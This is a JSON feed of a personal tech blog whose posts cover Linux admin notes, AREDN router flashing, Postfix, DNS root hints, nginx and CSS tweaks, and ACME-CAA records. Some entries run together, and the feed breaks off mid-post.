{ "version": "https://jsonfeed.org/version/1", "title": "x-log", "home_page_url": "https://blog.x-way.org", "feed_url": "https://blog.x-way.org/feed.json", "author": { "name": "Andreas Jaggi", "url": "https://blog.x-way.org" }, "items": [ { "id": "http://waterwave.ch/weblog/detail.php?id=324341", "title": "Linux Crisis Tools", "content_text": "Brendan Gregg posted the following list of 'crisis tools' which you should install on your Linux servers by default (so they are available when an incident happens).PackageProvidesNotesprocpsps(1), vmstat(8), uptime(1), top(1)basic statsutil-linuxdmesg(1), lsblk(1), lscpu(1)system log, device infosysstatiostat(1), mpstat(1), pidstat(1), sar(1)device statsiproute2ip(8), ss(8), nstat(8), tc(8)preferred net toolsnumactlnumastat(8)NUMA statstcpdumptcpdump(8)Network snifferlinux-tools-commonlinux-tools-$(uname -r)perf(1), turbostat(8)profiler and PMU statsbpfcc-tools (bcc)opensnoop(8), execsnoop(8), runqlat(8), softirqs(8),hardirqs(8), ext4slower(8), ext4dist(8), biotop(8),biosnoop(8), biolatency(8), tcptop(8), tcplife(8),trace(8), argdist(8), funccount(8), profile(8), etc.canned eBPF tools[1]bpftracebpftrace, basic versions of opensnoop(8),execsnoop(8), runqlat(8), biosnoop(8), etc.eBPF scripting[1]trace-cmdtrace-cmd(1)Ftrace CLInicstatnicstat(1)net device statsethtoolethtool(8)net device infotiptoptiptop(1)PMU/PMC topcpuidcpuid(1)CPU detailsmsr-toolsrdmsr(8), wrmsr(8)CPU digging", "content_html": "
Brendan Gregg posted the following list of 'crisis tools' which you should install on your Linux servers by default (so they are available when an incident happens).
Package | Provides | Notes |
---|---|---|
procps | ps(1), vmstat(8), uptime(1), top(1) | basic stats |
util-linux | dmesg(1), lsblk(1), lscpu(1) | system log, device info |
sysstat | iostat(1), mpstat(1), pidstat(1), sar(1) | device stats |
iproute2 | ip(8), ss(8), nstat(8), tc(8) | preferred net tools |
numactl | numastat(8) | NUMA stats |
tcpdump | tcpdump(8) | Network sniffer |
linux-tools-common linux-tools-$(uname -r) | perf(1), turbostat(8) | profiler and PMU stats |
bpfcc-tools (bcc) | opensnoop(8), execsnoop(8), runqlat(8), softirqs(8), hardirqs(8), ext4slower(8), ext4dist(8), biotop(8), biosnoop(8), biolatency(8), tcptop(8), tcplife(8), trace(8), argdist(8), funccount(8), profile(8), etc. | canned eBPF tools[1] |
bpftrace | bpftrace, basic versions of opensnoop(8), execsnoop(8), runqlat(8), biosnoop(8), etc. | eBPF scripting[1] |
trace-cmd | trace-cmd(1) | Ftrace CLI |
nicstat | nicstat(1) | net device stats |
ethtool | ethtool(8) | net device info |
tiptop | tiptop(1) | PMU/PMC top |
cpuid | cpuid(1) | CPU details |
msr-tools | rdmsr(8), wrmsr(8) | CPU digging |
At the recent HB9TF AGM fellow radio amateur HB9GVM gave an introductory presentation about AREDN.
Motivated by this, I ordered a MikroTik hAP ac lite and installed the AREDN firmware on it.
The following are my notes of the installation process.
brew install dnsmasq
mkdir tftp-rootcp $HOME/Downloads/aredn-3.23.12.0-ath79-mikrotik-mikrotik_routerboard-952ui-5ac2nd-initramfs-kernel.bin tftp-root/rb.elf
ifconfig en6 # use to check that IP is configuredsudo dnsmasq -i en6 -u $(whoami) --log-dhcp --bootp-dynamic --dhcp-range=192.168.1.100,192.168.1.200 -d -p0 -K --dhcp-boot=rb.elf --enable-tftp --tftp-root=$(pwd)/tftp-root/
ping 192.168.1.1
http://192.168.1.1/cgi-bin/admin
(Username is root
and password is hsmm
).http://192.168.1.1
– congratulations, you now have a freshly installed (and not yet configured) AREDN node :-)Fifty Things you can do with a Software Defined Radio đ» — some cool SDR things to do (have done already some of them and more with my HB9TF friends :-)
(via)
Also using this post to introduce a new category: Radio
Which will serve as a container for radio/HAM/Wireless related content.
100 things you can do on your personal website — lots of ideas/inspirations also for this blog :-)
(via)
", "url": "https://blog.x-way.org/Misc/2024/03/07/100-things-you-can-do-on-your-personal-website.html", "tags": ["Misc"], "date_published": "2024-03-07T23:56:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324337", "title": "Tunnelbroker to the rescue", "content_text": "After nicely delivering native IPv6 connectivity for 3 years, my Internet provider Solnet made some changes in their backbone config on January 31st which broke their IPv6 setup.Unfortunately escalating with their support did not bear any fruits so far (current state: they no longer respond on the support ticket…).Thus change of plans, tunnelbroker.net (Hurricane Electric) to the rescue.Took about 10 minutes to set everything up and now I'm enjoying IPv6 connectivity again (although with a reduced end-to-end MTU due to the 6in4 encapsulation).Guess I'll have to look for a different Internet provider again.Especially annoying is that I renewed the yearly plan with Solnet only a couple weeks ago, so will be stuck without native IPv6 connectivity for the next 11 months :-(", "content_html": "After nicely delivering native IPv6 connectivity for 3 years, my Internet provider Solnet made some changes in their backbone config on January 31st which broke their IPv6 setup.
Unfortunately escalating with their support did not bear any fruits so far (current state: they no longer respond on the support ticket…).
Thus change of plans, tunnelbroker.net (Hurricane Electric) to the rescue.
Took about 10 minutes to set everything up and now I'm enjoying IPv6 connectivity again (although with a reduced end-to-end MTU due to the 6in4 encapsulation).
Guess I'll have to look for a different Internet provider again.
Especially annoying is that I renewed the yearly plan with Solnet only a couple weeks ago, so will be stuck without native IPv6 connectivity for the next 11 months :-(
In the The High-Risk Refactoring article there is this concise Addressing Risk checklist to keep in mind when refactoring.
During past refactorings (also low-risk ones) I often used almost the same guidelines to help me and can only recommend you to do the same:
â Define constraints. How far should I go.
â Isolate improvements from features. Do not apply them simultaneously.
â Write extensive tests. Higher level (integration) with fewer implementation details. They should run alongside changes.
â Have a visual confirmation. Open the browser.â Do not skip tests. Don't be lazy.
â Do not rely too much on code reviews and QA. Humans make mistakes.
â Do not mix expensive cleanups with other changes. But do that for small improvements.
(via)
", "url": "https://blog.x-way.org/Coding/2024/02/25/The-High-Risk-Refactoring.html", "tags": ["Coding"], "date_published": "2024-02-25T04:02:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324335", "title": "Please Blog", "content_text": "Please Blog — a plea for less Big Web and more Small Web and an encouraging article to write your own blog. It also touches on the part about writing on your own domain (so to keep your content yours and not be at risk of a third-party commercial 'social' service going away).Donât wait for the Pulitzer piece. Tell me about your ride to work, about your food, what flavor ice cream you like. Let me be part of happiness and sadness. Show me, that there is a human being out there that, agree or not, I can relate to. Because without it, we are just actors in a sea of actors, marketing, proselytizing, advocating, and threatening towards each other in an always vicious circle of striving for a relevance that only buys us more marketing, more proselytizing, more advocating, and more threats.(discovered via Thomas Gigold)", "content_html": "Please Blog — a plea for less Big Web and more Small Web and an encouraging article to write your own blog. It also touches on the part about writing on your own domain (so to keep your content yours and not be at risk of a third-party commercial 'social' service going away).
Donât wait for the Pulitzer piece. Tell me about your ride to work, about your food, what flavor ice cream you like. Let me be part of happiness and sadness. Show me, that there is a human being out there that, agree or not, I can relate to. Because without it, we are just actors in a sea of actors, marketing, proselytizing, advocating, and threatening towards each other in an always vicious circle of striving for a relevance that only buys us more marketing, more proselytizing, more advocating, and more threats.
(discovered via Thomas Gigold)
", "url": "https://blog.x-way.org/Misc/2024/02/25/Please-Blog.html", "tags": ["Misc"], "date_published": "2024-02-25T03:17:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324334", "title": "ads.txt", "content_text": "Added and ads.txt file to the blog. The idea is to avoid that someone can sell fake advertisment space for this blog.As I don't use any advertisment here the content of the file is pretty basic:contact=https://blog.x-way.org/about.html", "content_html": "Added and ads.txt file to the blog. The idea is to avoid that someone can sell fake advertisment space for this blog.
As I don't use any advertisment here the content of the file is pretty basic:
contact=https://blog.x-way.org/about.html", "url": "https://blog.x-way.org/Webdesign/2024/02/18/ads-txt.html", "tags": ["Webdesign"], "date_published": "2024-02-18T17:38:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324333", "title": "ldapauth", "content_text": "ldapauth is a Node.js script which I have been using for the last 12+ years mostly unchanged.It started its life in a LXC container, eventually was moved to a Docker container and recently ended up in its own repository on GitHub.The functionality it provides is not extraordinary, but helped to bridge a gap where no other product was available.It talks LDAP one one side (although limited to handle user lookup requests) and on the other side connects to a MongoDB database where the information is stored.It emerged out of the desire to have an easy way to manage individual user accounts for my home WiFi. I already had MongoDB running for some other personal project and simply added the list of users there (including the UI for managing them).Thus the missing part was to get the WiFi accesspoint to lookup user accounts in MongoDB.Of course WiFi accesspoints do not directly talk MongoDB, but rather some other protocol like RADIUS.A freeradius server was quickly setup, but still couldn't talk to MongoDB at the time. Thus comes in ldapauth, which takes LDAP queries from freeradius and turns them into MongoDB lookups so that in the end the WiFi accesspoint receives the user accounts :-)Not sure if this is particularly useful for anyone else, but at least here it did provide good services (and continues to do so).Current score is that it has survived three different WiFi accesspoints and has been running on 5 different servers over the time.", "content_html": "
ldapauth is a Node.js script which I have been using for the last 12+ years mostly unchanged.
It started its life in a LXC container, eventually was moved to a Docker container and recently ended up in its own repository on GitHub.
The functionality it provides is not extraordinary, but helped to bridge a gap where no other product was available.
It talks LDAP one one side (although limited to handle user lookup requests) and on the other side connects to a MongoDB database where the information is stored.
It emerged out of the desire to have an easy way to manage individual user accounts for my home WiFi. I already had MongoDB running for some other personal project and simply added the list of users there (including the UI for managing them).
Thus the missing part was to get the WiFi accesspoint to lookup user accounts in MongoDB.
Of course WiFi accesspoints do not directly talk MongoDB, but rather some other protocol like RADIUS.
A freeradius server was quickly setup, but still couldn't talk to MongoDB at the time. Thus comes in ldapauth, which takes LDAP queries from freeradius and turns them into MongoDB lookups so that in the end the WiFi accesspoint receives the user accounts :-)
Not sure if this is particularly useful for anyone else, but at least here it did provide good services (and continues to do so).
Current score is that it has survived three different WiFi accesspoints and has been running on 5 different servers over the time.
Some vibes from Australia ❤
", "url": "https://blog.x-way.org/Music/2024/02/18/Hilltop-Hoods-Laced-Up.html", "tags": ["Music"], "date_published": "2024-02-18T08:31:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324331", "title": "qr-bag", "content_text": "Some time ago I used an online tool to generate some QR codes with a contact URL so I can put them on my luggage.Now I got a new bag and need a new QR code for it. As I don't remember the online tool I used years ago, I decided to write my own tool.Thus say hello to qr-bag. It's a commandline tool written in Go to generate QR codes for URLs with a little logo in the middle.The code for it is mostly a wrapper around the go-qrcode library which does all the heavy lifting.", "content_html": "Some time ago I used an online tool to generate some QR codes with a contact URL so I can put them on my luggage.
Now I got a new bag and need a new QR code for it. As I don't remember the online tool I used years ago, I decided to write my own tool.
Thus say hello to qr-bag. It's a commandline tool written in Go to generate QR codes for URLs with a little logo in the middle.
The code for it is mostly a wrapper around the go-qrcode library which does all the heavy lifting.
Just discovered the text-decoration-color
CSS property and added it to the style on the blog:
a:hover {color: #454545; text-decoration: underline; text-decoration-color: #26C4FF;}
This causes that when you hover over a link in a post, the underline is not in the same boring gray as the text but lights up in a nice color :-)
(not to be confused with the hacky colored underlines in the righthand navigation bar, where I use a colored border-bottom
to achieve a similar effect since 2002)
It's time again to do some cleanup of my blogroll before the links start to turn into 404 errors :-)
Removed:
Following in the trend of replacing tables, I've revived the old statistics page.
Now using less markup as it is built with <div>
and CSS only (the display: inline-block;
property was particularly helpful).
(the Jekyll/Liquid templating to generate the data for it looks quite horrific though…)
", "url": "https://blog.x-way.org/Misc/2024/01/30/Statistics-revived.html", "tags": ["Misc"], "date_published": "2024-01-30T06:46:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324327", "title": "Tables are gone", "content_text": "Over the last couple weeks I slowly replaced the various <table>-based layout elements of the blog with more modern HTML elements.And finally this afternoon the work was completed with the last <table> element gone.Visually there should be almost no differences, but in case something looks strange just let me know :-)(and yes, style-wise everything is still using the pixel-based layout from 2002, one day this might change as well…)", "content_html": "Over the last couple weeks I slowly replaced the various <table>-based layout elements of the blog with more modern HTML elements.
And finally this afternoon the work was completed with the last <table> element gone.
Visually there should be almost no differences, but in case something looks strange just let me know :-)
(and yes, style-wise everything is still using the pixel-based layout from 2002, one day this might change as well…)
To provide basic dark mode support for the blog, I added the following lines of CSS:
@media (prefers-color-scheme: dark) { html { filter: invert(1) hue-rotate(180deg); } img, video, iframe { filter: invert(1) hue-rotate(180deg); }}
If the browser/OS has dark mode enabled it will invert the colors and rotate the hue to achieve the dark mode effect.
The whole operation is applied a second time on images, videos and frames to avoid that they have their colors distorted.
You can get a preview by using the developer tools of your browser to enable dark mode :-)
The code is inspired by the post here, and then extended to provide a CSS-only solution by leveraging the color-scheme CSS property.
", "url": "https://blog.x-way.org/Webdesign/2024/01/27/Quick-and-dirty-dark-mode.html", "tags": ["Webdesign"], "date_published": "2024-01-27T15:59:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324325", "title": "Sub Focus, Dimension, Culture Shock & 1991", "content_text": "Some very fine Drum and bass. Recently got to experience two of them live (Sub Focus & 1991), and have plans to see Dimension next :-)Especially like the little The Prodigy mixin starting at 1:04:30 🥳", "content_html": "Some very fine Drum and bass. Recently got to experience two of them live (Sub Focus & 1991), and have plans to see Dimension next :-)
Especially like the little The Prodigy mixin starting at 1:04:30 🥳
", "url": "https://blog.x-way.org/Music/2024/01/21/Sub-Focus-Dimension-Culture-Shock-1991.html", "tags": ["Music"], "date_published": "2024-01-21T22:16:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324324", "title": "Keeping old URLs alive", "content_text": "As mentioned before, I'm a supporter of the Cool URIs don't change approach.Thus I try to keep all the URLs of this blog working (or at least make them redirect to the new place where the content is located).Not always an easy task with old domains and multiple blogging engines accumulated over the years.To help me with that (and ensure I don't break anything when updating a 10+ year old mod_rewrite config) I created a short Bash script to test the redirect behavior.It contains a list of URLs and their expected redirect target, goes through them with curl and checks that the correct Location: header is returned.As it might be useful for others in similar situations, the script can be found here.", "content_html": "As mentioned before, I'm a supporter of the Cool URIs don't change approach.
Thus I try to keep all the URLs of this blog working (or at least make them redirect to the new place where the content is located).
Not always an easy task with old domains and multiple blogging engines accumulated over the years.
To help me with that (and ensure I don't break anything when updating a 10+ year old mod_rewrite config) I created a short Bash script to test the redirect behavior.
It contains a list of URLs and their expected redirect target, goes through them with curl and checks that the correct Location:
header is returned.
As it might be useful for others in similar situations, the script can be found here.
", "url": "https://blog.x-way.org/Misc/2024/01/21/Keeping-old-URLs-alive.html", "tags": ["Misc"], "date_published": "2024-01-21T21:41:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324323", "title": "I miss human curation", "content_text": "I miss human curation — Where are my internet friends? And where are their weird blogs? (via)", "content_html": "I miss human curation — Where are my internet friends? And where are their weird blogs? (via)
", "url": "https://blog.x-way.org/Misc/2024/01/21/I-miss-human-curation.html", "tags": ["Misc"], "date_published": "2024-01-21T07:14:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324322", "title": "Postfix clear verification cache", "content_text": "While adding some new alias functionality to my setup, it repeatedly failed with an error similar to this, despite my configuration changes:Recipient address rejected: unverified address: host XXX[XXX] said: 550 5.1.1 <foo@bar.com> User doesn't exist: foo@bar.com (in reply to RCPT TO command);Turns out that the negative verification result is cached and the cache is not reset during a reload/restart of postfix.Thus it must be cleared manually like this:/etc/init.d/postfix stoprm /var/lib/postfix/verify_cache.db/etc/init.d/postfix start", "content_html": "
While adding some new alias functionality to my setup, it repeatedly failed with an error similar to this, despite my configuration changes:
Recipient address rejected: unverified address: host XXX[XXX] said: 550 5.1.1 <foo@bar.com> User doesn't exist: foo@bar.com (in reply to RCPT TO command);
Turns out that the negative verification result is cached and the cache is not reset during a reload/restart of postfix.
Thus it must be cleared manually like this:
/etc/init.d/postfix stoprm /var/lib/postfix/verify_cache.db/etc/init.d/postfix start", "url": "https://blog.x-way.org/Linux/2024/01/07/Postfix-clear-verification-cache.html", "tags": ["Linux"], "date_published": "2024-01-07T22:38:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324321", "title": "Valid HTML5", "content_text": "After switching the colors of the design, I kept the momentum and continued working on the HTML of the blog.It took couple iterations of multiple hours, but now it's done: the HTML source of this blog is valid HTML5!Getting rid of the obsoleteness hidden in old blogentries dating back over 20 years also led to some interesting observations.Back when moving from HTML 4.01 to XHTML 1.1, I remember spending some time to transform old <br> tags to <br />. And now for HTML5 I did the inverse and moved all <br /> tags back to <br> :-)Also once more I'm very thankful for the work of the Internet Archive, which helped to recover images hosted on servers long gone (like URLs which already at the end of 2002 were no longer valid!).Overall a lot of replacing no longer existing HTML tags and attributes with CSS definitions.And there is virtually no change to the visual representation of the blog (which was the goal), so we still have the table-based layout with pixel-sized fonts as originally drafted in 2002.Moving this to actually leverage modern HTML5 mechanisms and making it also more mobile friendly are tasks left for some future cold winter evenings :-)", "content_html": "
After switching the colors of the design, I kept the momentum and continued working on the HTML of the blog.
It took couple iterations of multiple hours, but now it's done: the HTML source of this blog is valid HTML5!
Getting rid of the obsoleteness hidden in old blogentries dating back over 20 years also led to some interesting observations.
Back when moving from HTML 4.01 to XHTML 1.1, I remember spending some time to transform old <br>
tags to <br />
. And now for HTML5 I did the inverse and moved all <br />
tags back to <br>
:-)
Also once more I'm very thankful for the work of the Internet Archive, which helped to recover images hosted on servers long gone (like URLs which already at the end of 2002 were no longer valid!).
Overall a lot of replacing no longer existing HTML tags and attributes with CSS definitions.
And there is virtually no change to the visual representation of the blog (which was the goal), so we still have the table-based layout with pixel-sized fonts as originally drafted in 2002.
Moving this to actually leverage modern HTML5 mechanisms and making it also more mobile friendly are tasks left for some future cold winter evenings :-)
Happy New Year! — Happy New Colors!
Winter is here (for a while already), time to change the colors of the blog.
To keep it in the nostalgic theme (the previous design was a repurpose of the inital design from 2002), I'm using the colors from the 'plain 2' winter layout (also from 2002).
Enjoy!
", "url": "https://blog.x-way.org/Webdesign/2024/01/01/Winter-plain-2.html", "tags": ["Webdesign"], "date_published": "2024-01-01T12:41:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324319", "title": "MECSA", "content_text": "A comment on Hacker News pointed me to the MECSA tool provided by the European Union.MECSA stands for My Email Communications Security Assessment, and is a tool to assess the security of email communication between providers.As I run my own email server, I was curious to find out how my setup is scoring. Here are the results, seems like I'm doing a good job :-)Link to the full report for jaggi.info: https://mecsa.jrc.ec.europa.eu/en/finderRequest/f856486ecaf94dce5e8022c0a97c63b3", "content_html": "A comment on Hacker News pointed me to the MECSA tool provided by the European Union.
MECSA stands for My Email Communications Security Assessment, and is a tool to assess the security of email communication between providers.
As I run my own email server, I was curious to find out how my setup is scoring. Here are the results, seems like I'm doing a good job :-)
Link to the full report for jaggi.info: https://mecsa.jrc.ec.europa.eu/en/finderRequest/f856486ecaf94dce5e8022c0a97c63b3
", "url": "https://blog.x-way.org/Networking/2023/12/30/MECSA.html", "tags": ["Networking"], "date_published": "2023-12-30T09:16:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324318", "title": "Fix named checkhints extra record in hints", "content_text": "Recently named on my Debian server started to emit the following messages:Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/A (170.247.170.2) missing from hintsDec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/A (199.9.14.201) extra record in hintsDec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/AAAA (2801:1b8:10::b) missing from hintsDec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/AAAA (2001:500:200::b) extra record in hintsThe reason for these warnings, is a IP change of the B root-server.Debian is not ready yet with updating their dns-root-data package.To fix the mismatching IP definitions on a Debian system, the current root zone definitions can also be updated manually from Internic:curl https://www.internic.net/domain/named.root -s > /usr/share/dns/root.hintscurl https://www.internic.net/domain/named.root.sig -s > /usr/share/dns/root.hints.sig", "content_html": "Recently named on my Debian server started to emit the following messages:
Dec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/A (170.247.170.2) missing from hintsDec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/A (199.9.14.201) extra record in hintsDec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/AAAA (2801:1b8:10::b) missing from hintsDec 23 18:30:05 server named[1168203]: checkhints: view external_network: b.root-servers.net/AAAA (2001:500:200::b) extra record in hints
The reason for these warnings, is a IP change of the B root-server.
Debian is not ready yet with updating their dns-root-data package.
To fix the mismatching IP definitions on a Debian system, the current root zone definitions can also be updated manually from Internic:
curl https://www.internic.net/domain/named.root -s > /usr/share/dns/root.hintscurl https://www.internic.net/domain/named.root.sig -s > /usr/share/dns/root.hints.sig", "url": "https://blog.x-way.org/Linux/2023/12/27/Fix-named-checkhints-extra-record-in-hints.html", "tags": ["Linux"], "date_published": "2023-12-27T20:53:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324317", "title": "Wikipedia Donation", "content_text": "Seems that after donating to Wikipedia there is a redirect to this page, which sets a cookie to no longer show the donation banners.", "content_html": "
Seems that after donating to Wikipedia there is a redirect to this page, which sets a cookie to no longer show the donation banners.
", "url": "https://blog.x-way.org/Misc/2023/12/10/Wikipedia-Donation.html", "tags": ["Misc"], "date_published": "2023-12-10T22:24:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324316", "title": "Why Personal Blogging Still Rules", "content_text": "Resonating article from Mike Grindle about personal blogging and how it fits into todays Internet: Why Personal Blogging Still Rules\tBefore the social media craze or publishing platforms, and long before âcontent creatorâ was a job title, blogs served as one of the primary forms of online expression and communication.\tEverything on your blog was made to look and feel the way you wanted. If it didnât, you rolled your sleeves up and coded that stuff in like the webmaster you were. And if the masses didnât like it, who cared? They had no obligations to you, and you had none to them.\tHiding beneath the drivel that is Googleâs search results, and all the trackers, cookies, ads and curated feeds that come with them, personal blogs and sites of all shapes and sizes are still there. Theyâre thriving even in a kind of interconnected web beneath the web.\tThe blogs on this small or âindieâ web come in many shapes and sizes. […] But at their core, they all have one characteristic in common: theyâre there because their owners wanted to carve out their space on the internet.\tYour blog doesnât have to be big and fancy. It doesnât have to outrank everyone on Google, make money or âconvert leadsâ to be important. It can be something that exists for its own sake, as your place to express yourself in whatever manner you please.(via)", "content_html": "Resonating article from Mike Grindle about personal blogging and how it fits into todays Internet: Why Personal Blogging Still Rules
\tBefore the social media craze or publishing platforms, and long before âcontent creatorâ was a job title, blogs served as one of the primary forms of online expression and communication.
\tEverything on your blog was made to look and feel the way you wanted. If it didnât, you rolled your sleeves up and coded that stuff in like the webmaster you were. And if the masses didnât like it, who cared? They had no obligations to you, and you had none to them.
\tHiding beneath the drivel that is Googleâs search results, and all the trackers, cookies, ads and curated feeds that come with them, personal blogs and sites of all shapes and sizes are still there. Theyâre thriving even in a kind of interconnected web beneath the web.
\tThe blogs on this small or âindieâ web come in many shapes and sizes. […] But at their core, they all have one characteristic in common: theyâre there because their owners wanted to carve out their space on the internet.
\tYour blog doesnât have to be big and fancy. It doesnât have to outrank everyone on Google, make money or âconvert leadsâ to be important. It can be something that exists for its own sake, as your place to express yourself in whatever manner you please.
(via)
", "url": "https://blog.x-way.org/Misc/2023/04/30/Why-Personal-Blogging-Still-Rules.html", "tags": ["Misc"], "date_published": "2023-04-30T14:42:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324315", "title": "exec-hookd", "content_text": "To automate some of the deployment steps on my personal server, I needed a tool which can be triggered by a webhook and does execute some pre-defined commands.A classic solution for this would be to have a simple PHP script with a call to system(...). But I don't have PHP installed on the server itself and wanted this to be more lightweight than a full Apache+PHP installation.Thus exec-hookd was born. It is a small Go daemon which listens to HTTP POST requests and runs pre-defined commands when a matching path is requested.Its configuration lives in a small JSON file, which lists the port to listen on and the paths together with their commands to execute:{ \"Port\": 8059, \"HookList\": [ { \"Path\": \"/myhook\", \"Exec\": [ { \"Cmd\": \"/usr/bin/somecmd\", \"Args\": [ \"--some\", \"arguments\" ], \"Timeout\": \"5s\" } ] } ]}The commands are called with a timeout after which they are stopped to avoid that things hang around forever.", "content_html": "To automate some of the deployment steps on my personal server, I needed a tool which can be triggered by a webhook and does execute some pre-defined commands.
A classic solution for this would be to have a simple PHP script with a call to system(...)
. But I don't have PHP installed on the server itself and wanted this to be more lightweight than a full Apache+PHP installation.
Thus exec-hookd was born. It is a small Go daemon which listens to HTTP POST requests and runs pre-defined commands when a matching path is requested.
Its configuration lives in a small JSON file, which lists the port to listen on and the paths together with their commands to execute:
{ \"Port\": 8059, \"HookList\": [ { \"Path\": \"/myhook\", \"Exec\": [ { \"Cmd\": \"/usr/bin/somecmd\", \"Args\": [ \"--some\", \"arguments\" ], \"Timeout\": \"5s\" } ] } ]}
The commands are called with a timeout after which they are stopped to avoid that things hang around forever.
", "url": "https://blog.x-way.org/Linux/2023/04/23/exec-hookd.html", "tags": ["Linux"], "date_published": "2023-04-23T22:32:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324314", "title": "Nice git log alias", "content_text": "Ralf tooted a nice and tidy git log output alias for the console:alias glg=\"git log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' --abbrev-commit\"", "content_html": "Ralf tooted a nice and tidy git log output alias for the console:
alias glg=\"git log --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' --abbrev-commit\"
",
"url": "https://blog.x-way.org/Coding/2023/04/16/Nice-git-log-alias.html",
"tags": ["Coding"],
"date_published": "2023-04-16T13:55:00+00:00"
},
{
"id": "http://waterwave.ch/weblog/detail.php?id=324313",
"title": "Docker registry facade with nginx",
"content_text": "Found this inspiring blog post about how to use your own domain for Docker images. (via HN)It explains how to use your own domain with redirects such that the Docker registry hosting the images can be changed easily. Your domain is only used for issueing HTTP redirects, so that the actual data storage and transfer happens directly with the Docker registry.The blog post comes with a sample implementation for Caddy. As my server is running nginx, I used the following config snippet to achieve the same result:server {\tlisten 443 ssl;\tlisten [::]:443 ssl;\tserver_name\tdocker.x-way.org;\taccess_log\t/var/log/nginx/docker.x-way.org.access.log;\terror_log\t/var/log/nginx/docker.x-way.org.error.log;\tssl_certificate\t\t/etc/letsencrypt/live/docker.x-way.org/fullchain.pem;\tssl_certificate_key\t/etc/letsencrypt/live/docker.x-way.org/privkey.pem;\tlocation / {\t\treturn 403;\t}\tlocation = /v2 {\t\tadd_header Cache-Control 'max-age=300, must-revalidate';\t\treturn 307 https://registry.hub.docker.com$request_uri;\t}\tlocation = /v2/ {\t\tadd_header Cache-Control 'max-age=300, must-revalidate';\t\treturn 307 https://registry.hub.docker.com$request_uri;\t}\tlocation = /v2/xway {\t\tadd_header Cache-Control 'max-age=300, must-revalidate';\t\treturn 307 https://registry.hub.docker.com$request_uri;\t}\tlocation /v2/xway/ {\t\tadd_header Cache-Control 'max-age=300, must-revalidate';\t\treturn 307 https://registry.hub.docker.com$request_uri;\t}}Quickly tested it with some docker pull commands and already integrated it into the build process of dnsupd.",
"content_html": "Found this inspiring blog post about how to use your own domain for Docker images. (via HN)
It explains how to use your own domain with redirects such that the Docker registry hosting the images can be changed easily. Your domain is only used for issueing HTTP redirects, so that the actual data storage and transfer happens directly with the Docker registry.
The blog post comes with a sample implementation for Caddy. As my server is running nginx, I used the following config snippet to achieve the same result:
server {\tlisten 443 ssl;\tlisten [::]:443 ssl;\tserver_name\tdocker.x-way.org;\taccess_log\t/var/log/nginx/docker.x-way.org.access.log;\terror_log\t/var/log/nginx/docker.x-way.org.error.log;\tssl_certificate\t\t/etc/letsencrypt/live/docker.x-way.org/fullchain.pem;\tssl_certificate_key\t/etc/letsencrypt/live/docker.x-way.org/privkey.pem;\tlocation / {\t\treturn 403;\t}\tlocation = /v2 {\t\tadd_header Cache-Control 'max-age=300, must-revalidate';\t\treturn 307 https://registry.hub.docker.com$request_uri;\t}\tlocation = /v2/ {\t\tadd_header Cache-Control 'max-age=300, must-revalidate';\t\treturn 307 https://registry.hub.docker.com$request_uri;\t}\tlocation = /v2/xway {\t\tadd_header Cache-Control 'max-age=300, must-revalidate';\t\treturn 307 https://registry.hub.docker.com$request_uri;\t}\tlocation /v2/xway/ {\t\tadd_header Cache-Control 'max-age=300, must-revalidate';\t\treturn 307 https://registry.hub.docker.com$request_uri;\t}}
Quickly tested it with some docker pull commands and already integrated it into the build process of dnsupd.
", "url": "https://blog.x-way.org/Linux/2023/03/18/Docker-registry-facade-with-nginx.html", "tags": ["Linux"], "date_published": "2023-03-18T10:36:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324312", "title": "STRAYA 🇦🇺", "content_text": "Here's a bit older mashup. Happy Australia Day!", "content_html": "Here's a bit older mashup. Happy Australia Day!
", "url": "https://blog.x-way.org/Music/2023/01/26/STRAYA.html", "tags": ["Music"], "date_published": "2023-01-26T05:43:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324311", "title": "ACME-CAA", "content_text": "Let's Encrypt recently introduced support for ACME-CAA.I've now extended my existing CAA DNS entries with the ACME-CAA properties:% dig +short -t CAA x-way.org0 issue \"letsencrypt.org; accounturi=https://acme-v02.api.letsencrypt.org/acme/acct/68891730; validationmethods=http-01\"0 issue \"letsencrypt.org; accounturi=https://acme-v02.api.letsencrypt.org/acme/acct/605777876; validationmethods=http-01\"The effect of this is that Let's Encrypt will only grant a signed TLS certificate if the request comes from one of my two accounts (authenticated with the corresponding private key).If the certificate request comes from a different account, no TLS certificate will be granted.This protects against man-in-the-middle attacks, specifically against attacks where someone between Let's Encrypt and my server would be trying to impersonate my server to obtain a signed TLS certificate.Addendum:In case you're wondering where to get the accounturi value from, it can be found in your account file:% cat /etc/letsencrypt/accounts/acme-v02.api.letsencrypt.org/directory/*/regr.json{\"body\": {}, \"uri\": \"https://acme-v02.api.letsencrypt.org/acme/acct/605777876\"}", "content_html": "Let's Encrypt recently 